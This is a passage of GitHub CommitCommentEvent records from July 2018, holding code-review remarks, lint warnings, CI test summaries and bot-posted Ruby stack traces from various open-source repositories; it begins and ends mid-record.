weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-18T21:04:13Z"}
{"id":"7985472364","type":"CommitCommentEvent","actor":{"login":"jputrino"},"repo":{"name":"f5devcentral/f5-sphinx-theme"},"payload":{"comment":{"id":29755859,"position":null,"line":null,"path":null,"commit_id":"558f2a56e29574204d025b16de0cb48369588131","created_at":"2018-07-18T21:06:00Z","updated_at":"2018-07-18T21:06:00Z","author_association":"COLLABORATOR","body":"I think it's the change to how the env variables are passed to the container -- it's pulling in the commit message as one of the commands passed to the container."}},"created_at":"2018-07-18T21:06:00Z"}
{"id":"7985476957","type":"CommitCommentEvent","actor":{"login":"jputrino"},"repo":{"name":"f5devcentral/f5-sphinx-theme"},"payload":{"comment":{"id":29755864,"position":null,"line":null,"path":null,"commit_id":"558f2a56e29574204d025b16de0cb48369588131","created_at":"2018-07-18T21:07:01Z","updated_at":"2018-07-18T21:07:01Z","author_association":"COLLABORATOR","body":"Also, Alpine doesn't support bash, only sh - http://containertutorials.com/alpine/get_started.html"}},"created_at":"2018-07-18T21:07:01Z"}
{"id":"7985480416","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"LukaszRogacz/Lukasz-Rogacz-kodilla-tasks"},"payload":{"comment":{"id":29755875,"position":25,"line":25,"path":"src/main/java/com/crud/tasks/controller/TrelloController.java","commit_id":"625f608461882542b8b85704a5edeb0e3c442801","created_at":"2018-07-18T21:07:47Z","updated_at":"2018-07-18T21:07:47Z","author_association":"NONE","body":"Najpierw powinno być sprawdzenie czy getName() jest różne od nulla, podobnie z getId(). Jeśli wywołasz cokolwiek na nullu (isEmpty() lub contains()) dostaniesz NullPointerException"}},"created_at":"2018-07-18T21:07:47Z"}
{"id":"7985488744","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"FRidh/nixpkgs"},"payload":{"comment":{"id":29755883,"position":151,"line":107,"path":"pkgs/applications/science/math/sage/default.nix","commit_id":"c6e27de8352e856890561ad5b259de670d0921f0","created_at":"2018-07-18T21:09:04Z","updated_at":"2018-07-18T21:09:04Z","author_association":"OWNER","body":"pkgs should be removed"}},"created_at":"2018-07-18T21:09:04Z"}
{"id":"7985489069","type":"CommitCommentEvent","actor":{"login":"MxBoud"},"repo":{"name":"AlexandreDoucet/InfinityBike"},"payload":{"comment":{"id":29755884,"position":null,"line":null,"path":null,"commit_id":"ebfbbf5c2e938200916bac93e895f2e2fadc37b3","created_at":"2018-07-18T21:09:08Z","updated_at":"2018-07-18T21:09:08Z","author_association":"COLLABORATOR","body":"Merci 👍 !"}},"created_at":"2018-07-18T21:09:08Z"}
{"id":"7985489857","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"FRidh/nixpkgs"},"payload":{"comment":{"id":29755886,"position":141,"line":98,"path":"pkgs/applications/science/math/sage/default.nix","commit_id":"c6e27de8352e856890561ad5b259de670d0921f0","created_at":"2018-07-18T21:09:19Z","updated_at":"2018-07-18T21:09:19Z","author_association":"OWNER","body":"pkgs should be removed"}},"created_at":"2018-07-18T21:09:19Z"}
{"id":"7985496424","type":"CommitCommentEvent","actor":{"login":"pq"},"repo":{"name":"dart-lang/sdk"},"payload":{"comment":{"id":29755897,"position":3,"line":3,"path":"pkg/meta/CHANGELOG.md","commit_id":"d533cef4b8fc38bc6c479ff6e692c7336c6ee6bc","created_at":"2018-07-18T21:10:43Z","updated_at":"2018-07-18T21:10:43Z","author_association":"MEMBER","body":"Sure thing.  PR in flight!"}},"created_at":"2018-07-18T21:10:43Z"}
{"id":"7985497654","type":"CommitCommentEvent","actor":{"login":"pq"},"repo":{"name":"dart-lang/sdk"},"payload":{"comment":{"id":29755898,"position":null,"line":null,"path":null,"commit_id":"d533cef4b8fc38bc6c479ff6e692c7336c6ee6bc","created_at":"2018-07-18T21:10:58Z","updated_at":"2018-07-18T21:10:58Z","author_association":"MEMBER","body":"On the way!"}},"created_at":"2018-07-18T21:10:58Z"}
{"id":"7985505776","type":"CommitCommentEvent","actor":{"login":"jmroot"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29755920,"position":4,"line":233,"path":"python/py-graveyard/Portfile","commit_id":"be83b67a0fa270989f2ac4d862aefa3d6f411c89","created_at":"2018-07-18T21:12:39Z","updated_at":"2018-07-18T21:12:39Z","author_association":"MEMBER","body":"I thought the plan was to keep setuptools, pip and virtualenv available for old python versions so that people who need to use them can install modules."}},"created_at":"2018-07-18T21:12:39Z"}
{"id":"7985506906","type":"CommitCommentEvent","actor":{"login":"Jhon112"},"repo":{"name":"Jhon112/Ruby_clase2"},"payload":{"comment":{"id":29755922,"position":7,"line":3,"path":"tarea_condicionales.rb","commit_id":"fd358705f04672a1c0d6deba59976339423c6b02","created_at":"2018-07-18T21:12:53Z","updated_at":"2018-07-18T21:12:53Z","author_association":"OWNER","body":"Esta linea se usa solo para hacer el test al codigo ."}},"created_at":"2018-07-18T21:12:53Z"}
{"id":"7985507487","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave-intl/bat-go"},"payload":{"comment":{"id":29755924,"position":51,"line":51,"path":"utils/passphrase/passphrase_test.go","commit_id":"ab0ec7f6a7092cbabbe19e8251c509c1e95281fe","created_at":"2018-07-18T21:13:00Z","updated_at":"2018-07-18T21:13:00Z","author_association":"NONE","body":"for cross-compatibility with the node lib, this should probably check that the signature output is the same as the corresponding test in brave-crypto. i just checked and it's:\r\n```\r\n81d39235e6e1ed07e7d2cee6380aa07f415ab4b43cc4cef4043e61171ac5511253807105aba9b7\r\nb9c9cdbb0e84517178176d87f757801275a16477a51013e10de282ac2031323320e38383e38383e38383e\r\n38080e38182\r\n```"}},"created_at":"2018-07-18T21:13:00Z"}
{"id":"7985510593","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave-intl/bat-go"},"payload":{"comment":{"id":29755932,"position":null,"line":null,"path":null,"commit_id":"ab0ec7f6a7092cbabbe19e8251c509c1e95281fe","created_at":"2018-07-18T21:13:39Z","updated_at":"2018-07-18T21:13:39Z","author_association":"NONE","body":"overall lgtm!"}},"created_at":"2018-07-18T21:13:39Z"}
{"id":"7985512566","type":"CommitCommentEvent","actor":{"login":"jugorcz"},"repo":{"name":"PanSzczerba/microext2"},"payload":{"comment":{"id":29755935,"position":null,"line":null,"path":null,"commit_id":"cb732ba0ec01ec24ae1dadbb501dc2d02027536e","created_at":"2018-07-18T21:14:07Z","updated_at":"2018-07-18T21:14:07Z","author_association":"COLLABORATOR","body":"Makefile looks good but I am not sure if we need such variables as SRCDIR=src, OUTDIR=out. They won't change in future and (in my opinion) code looks more clear with just \"src\" than \"$(SRCDIR)\".  "}},"created_at":"2018-07-18T21:14:07Z"}
{"id":"7985514304","type":"CommitCommentEvent","actor":{"login":"ivan-avdic"},"repo":{"name":"ivan-avdic/EventTrackerSpringSecurityDemo"},"payload":{"comment":{"id":29755941,"position":null,"line":null,"path":null,"commit_id":"10a6b07da278a8195601528e64e8018b0c9a9b00","created_at":"2018-07-18T21:14:29Z","updated_at":"2018-07-18T21:14:29Z","author_association":"OWNER","body":"HTTPS"}},"created_at":"2018-07-18T21:14:29Z"}
{"id":"7985526324","type":"CommitCommentEvent","actor":{"login":"samth"},"repo":{"name":"pycket/pycket"},"payload":{"comment":{"id":29755978,"position":8,"line":147,"path":"pycket/values_string.py","commit_id":"2783b395251b4fd94a37dc31b74160d9f8066ea3","created_at":"2018-07-18T21:17:06Z","updated_at":"2018-07-18T21:17:06Z","author_association":"COLLABORATOR","body":"Don't compute this twice."}},"created_at":"2018-07-18T21:17:06Z"}
{"id":"7985527810","type":"CommitCommentEvent","actor":{"login":"satabdichakraborty"},"repo":{"name":"satabdichakraborty/springboot-monitoring-example-1"},"payload":{"comment":{"id":29755980,"position":null,"line":null,"path":null,"commit_id":"d0108c26b0a5910073817ee3a251e4106365233c","created_at":"2018-07-18T21:17:24Z","updated_at":"2018-07-18T21:17:24Z","author_association":"OWNER","body":"going back to this version"}},"created_at":"2018-07-18T21:17:24Z"}
{"id":"7985528985","type":"CommitCommentEvent","actor":{"login":"craigdallimore"},"repo":{"name":"juliazuzanna/chicken-biscuit"},"payload":{"comment":{"id":29755982,"position":4,"line":55,"path":"index.html","commit_id":"80eae07b0a1fefe9c7b683f9de12faa4e0a68ed4","created_at":"2018-07-18T21:17:40Z","updated_at":"2018-07-18T21:17:40Z","author_association":"COLLABORATOR","body":"👍 🇷🇴 "}},"created_at":"2018-07-18T21:17:40Z"}
{"id":"7985534223","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"proshin-roman/blog"},"payload":{"comment":{"id":29755995,"position":null,"line":null,"path":null,"commit_id":"18173d279c0953cf25bef39d0ec18724fe01fee1","created_at":"2018-07-18T21:18:50Z","updated_at":"2018-07-18T21:18:50Z","author_association":"NONE","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> set -x && set -e && set -o pipefail && cd /tmp/0pdd20180718-4-11f5ntp/proshin-roman/blog && pdd -v -f /tmp/20180718-18679-hhhhld [1]: bash: warning: setlocale: LC_ALL: cannot change locale (UTF-8) + set -e + set -o pipefail + cd /tmp/0pdd20180718-4-11f5ntp/proshin-roman/blog + pdd -v -f...\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nUserError\nset -x && set -e && set -o pipefail && cd /tmp/0pdd20180718-4-11f5ntp/proshin-roman/blog && pdd -v -f /tmp/20180718-18679-hhhhld [1]:\nbash: warning: setlocale: LC_ALL: cannot change locale (UTF-8)\n+ set -e\n+ set -o pipefail\n+ cd /tmp/0pdd20180718-4-11f5ntp/proshin-roman/blog\n+ pdd -v -f /tmp/20180718-18679-hhhhld\n\nMy version is 0.20.3\nRuby version is 2.3.3 at x86_64-linux\nReading /tmp/0pdd20180718-4-11f5ntp/proshin-roman/blog\n75 file(s) found, 77 excluded\n/tmp/0pdd20180718-4-11f5ntp/proshin-roman/blog/web/src/main/resources/static/img/avatar.jpg is a binary file (49980 bytes)\n/tmp/0pdd20180718-4-11f5ntp/proshin-roman/blog/.mvn/wrapper/maven-wrapper.jar is a binary file (47610 bytes)\nReading appveyor.yml...\nReading .travis.yml...\nReading mvnw...\nReading .rultor.yml...\nReading base/pom.xml...\nReading base/src/test/java/org/proshin/blog/MarkdownTextTest.java...\nReading base/src/main/java/org/proshin/blog/Url.java...\nReading base/src/main/java/org/proshin/blog/MarkdownText.java...\nReading base/src/main/java/org/proshin/blog/DateToString.java...\nReading base/src/main/java/org/proshin/blog/StringToDate.java...\nReading .circleci/config.yml...\nReading pom.xml...\nReading storage/pom.xml...\nReading storage/src/main/java/org/proshin/blog/model/Post.java...\nReading storage/src/main/java/org/proshin/blog/model/PersistentPost.java...\nReading storage/src/main/java/org/proshin/blog/model/Posts.java...\nReading storage/src/main/java/org/proshin/blog/model/ConstantPost.java...\nReading storage/src/main/java/org/proshin/blog/exception/PostNotFoundException.java...\nReading README.md...\nReading .0pdd.yml...\nReading mysql-storage/pom.xml...\nReading mysql-storage/src/main/resources/db-migrations/changelog-0.0.4.xml...\nReading mysql-storage/src/main/resources/db-migrations/changelog.xml...\nReading mysql-storage/src/main/java/org/proshin/blog/mysql/MsPost.java...\nReading mysql-storage/src/main/java/org/proshin/blog/mysql/MsPosts.java...\nReading mysql-storage/src/main/java/org/proshin/blog/mysql/QueryResult.java...\nReading web/pom.xml...\nReading web/src/test/resources/application.yml...\nReading web/src/test/java/org/proshin/blog/AbstractIntegrationTest.java...\nReading web/src/test/java/org/proshin/blog/page/admin/AdminPostsPagesControllerTest.java...\nPuzzle 165-1d3be943 0/DEV at web/src/test/java/org/proshin/blog/page/admin/AdminPostsPagesControllerTest.java\nReading web/src/test/java/org/proshin/blog/page/admin/AdminPagesControllerTest.java...\nPuzzle 165-1d3be943 0/DEV at web/src/test/java/org/proshin/blog/page/admin/AdminPagesControllerTest.java\nReading web/src/test/java/org/proshin/blog/page/LoginPageControllerTest.java...\nReading web/src/main/resources/templates/error/404.ftl...\nReading web/src/main/resources/templates/post.ftl...\nReading web/src/main/resources/templates/login.ftl...\nReading web/src/main/resources/templates/error.ftl...\nReading web/src/main/resources/templates/admin/posts/edit.ftl...\nReading web/src/main/resources/templates/admin/posts/list.ftl...\nReading web/src/main/resources/templates/admin/dashboard.ftl...\nReading web/src/main/resources/templates/admin/base.ftl...\nReading web/src/main/resources/templates/index.ftl...\nReading web/src/main/resources/templates/base.ftl...\nReading web/src/main/resources/messages.properties...\nReading web/src/main/resources/static/css/bootstrap.css...\nReading web/src/main/resources/static/css/bootstrap.min.css...\nReading web/src/main/resources/static/css/custom.css...\nReading web/src/main/resources/logback.xml...\nReading web/src/main/resources/application.yml...\nReading web/src/main/java/org/proshin/blog/GlobalExceptionHandler.java...\nReading web/src/main/java/org/proshin/blog/configuration/BadReCaptchaCodeException.java...\nReading web/src/main/java/org/proshin/blog/configuration/WebSecurityConfig.java...\nReading web/src/main/java/org/proshin/blog/configuration/ConfigParameters.java...\nReading web/src/main/java/org/proshin/blog/configuration/ReCaptchaCodeVerifier.java...\nReading web/src/main/java/org/proshin/blog/configuration/ApplicationContext.java...\nReading web/src/main/java/org/proshin/blog/configuration/PersistentTokenBasedRememberMeServices.java...\nReading web/src/main/java/org/proshin/blog/configuration/MemoryTokenRepositoryImpl.java...\nReading web/src/main/java/org/proshin/blog/configuration/FreemarkerConfig.java...\nReading web/src/main/java/org/proshin/blog/configuration/ReCaptchaFilter.java...\nReading web/src/main/java/org/proshin/blog/page/SmartModelAndView.java...\nReading web/src/main/java/org/proshin/blog/page/GuestPagesController.java...\nReading web/src/main/java/org/proshin/blog/page/LoginPageController.java...\nReading web/src/main/java/org/proshin/blog/page/bind/Html5LocalDateTimeEditorSupport.java...\nReading web/src/main/java/org/proshin/blog/page/admin/AdminPagesController.java...\nReading web/src/main/java/org/proshin/blog/page/admin/AdminPostsPagesController.java...\nReading web/src/main/java/org/proshin/blog/BlogApplication.java...\nReading mvnw.cmd...\nReading CODE_OF_CONDUCT.md...\nReading LICENSE...\nReading .idea/codeStyleSettings.xml...\nReading .idea/encodings.xml...\nReading .mvn/wrapper/maven-wrapper.properties...\nReading .editorconfig...\nReading .gitignore...\nERROR: there are 2 duplicate(s) of the same puzzle: web/src/test/java/org/proshin/blog/page/admin/AdminPostsPagesControllerTest.java:27-27, web/src/test/java/org/proshin/blog/page/admin/AdminPagesControllerTest.java:13-13, while maximum 1 duplicate is allowed\nERROR: 1 errors, see log above. If you can't understand the cause of this issue or you don't know how to fix it, please submit a GitHub issue, we will try to help you: https://github.com/yegor256/pdd/issues. This tool is still in its beta version and we will appreciate your feedback. Here is where you can find more documentation: https://github.com/yegor256/pdd/blob/master/README.md.\nExit code is 1\n\n/app/objects/git_repo.rb:66:in `rescue in block in xml'\n/app/objects/git_repo.rb:63:in `block in xml'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/tempfile.rb:295:in `open'\n/app/objects/git_repo.rb:62:in `xml'\n/app/objects/puzzles.rb:36:in `deploy'\n/app/objects/job.rb:38:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-18T21:18:50Z"}
{"id":"7985534762","type":"CommitCommentEvent","actor":{"login":"xrav3nz"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29755997,"position":null,"line":null,"path":null,"commit_id":"2dc3a50dacb2aa699b0c68c9abf8fcc5436dc81b","created_at":"2018-07-18T21:18:58Z","updated_at":"2018-07-18T21:18:58Z","author_association":"CONTRIBUTOR","body":"Nice! I actually tried to look into this a while back, but couldn't come up with a failing spec."}},"created_at":"2018-07-18T21:18:58Z"}
{"id":"7985541014","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29756045,"position":null,"line":null,"path":null,"commit_id":"3426530b1bd0ede56bccf22d0f9571e0c4762774","created_at":"2018-07-18T21:20:21Z","updated_at":"2018-07-18T21:20:21Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - Win64-Windows-7-VisualStudio-14: OK (2942 of 2944 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 2 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3426530b1bd0ede56bccf22d0f9571e0c4762774-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3426530b1bd0ede56bccf22d0f9571e0c4762774-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-18T21:20:21Z"}
{"id":"7985544682","type":"CommitCommentEvent","actor":{"login":"pieandcakes"},"repo":{"name":"Microsoft/vscode-cpptools"},"payload":{"comment":{"id":29756058,"position":null,"line":null,"path":null,"commit_id":"12f6e72b9da4dd63951a9dc3bbe98c4d8811a87a","created_at":"2018-07-18T21:21:10Z","updated_at":"2018-07-18T21:21:10Z","author_association":"COLLABORATOR","body":"add a line:\r\n* Fix for debugging to support empty arguments for debuggee. [#2258](https://github.com/Microsoft/vscode-cpptools/issues/2258).\r\n* Fix for debugging async Visual C++ causing debugger to hang."}},"created_at":"2018-07-18T21:21:10Z"}
{"id":"7985581631","type":"CommitCommentEvent","actor":{"login":"epam-roman-iovlev"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29756145,"position":6,"line":44,"path":"java/client/src/org/openqa/selenium/os/WindowsUtils.java","commit_id":"f41fe5fb1a9bebaf4a29f1a51f00a6b281400fe9","created_at":"2018-07-18T21:29:19Z","updated_at":"2018-07-18T21:29:19Z","author_association":"NONE","body":"And what we should use instead?"}},"created_at":"2018-07-18T21:29:19Z"}
{"id":"7985582045","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29756147,"position":null,"line":null,"path":null,"commit_id":"92bbd1fc4bbe80c7942f4264f480308fe27af898","created_at":"2018-07-18T21:29:24Z","updated_at":"2018-07-18T21:29:24Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-87](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-87).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-87-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-18T21:29:24Z"}
{"id":"7985583056","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"proshin-roman/blog"},"payload":{"comment":{"id":29756150,"position":null,"line":null,"path":null,"commit_id":"fc94a878afb6b343b27c1bc92762eec7401aae5e","created_at":"2018-07-18T21:29:38Z","updated_at":"2018-07-18T21:29:38Z","author_association":"NONE","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> no implicit conversion of String into Integer\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nTypeError\nno implicit conversion of String into Integer\n/app/objects/commit_tickets.rb:39:in `dig'\n/app/objects/commit_tickets.rb:39:in `submit'\n/app/objects/emailed_tickets.rb:35:in `submit'\n/app/objects/sentry_tickets.rb:46:in `submit'\n/app/objects/puzzles.rb:91:in `block in expose'\n/app/objects/puzzles.rb:82:in `loop'\n/app/objects/puzzles.rb:82:in `expose'\n/app/objects/puzzles.rb:33:in `deploy'\n/app/objects/job.rb:38:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in 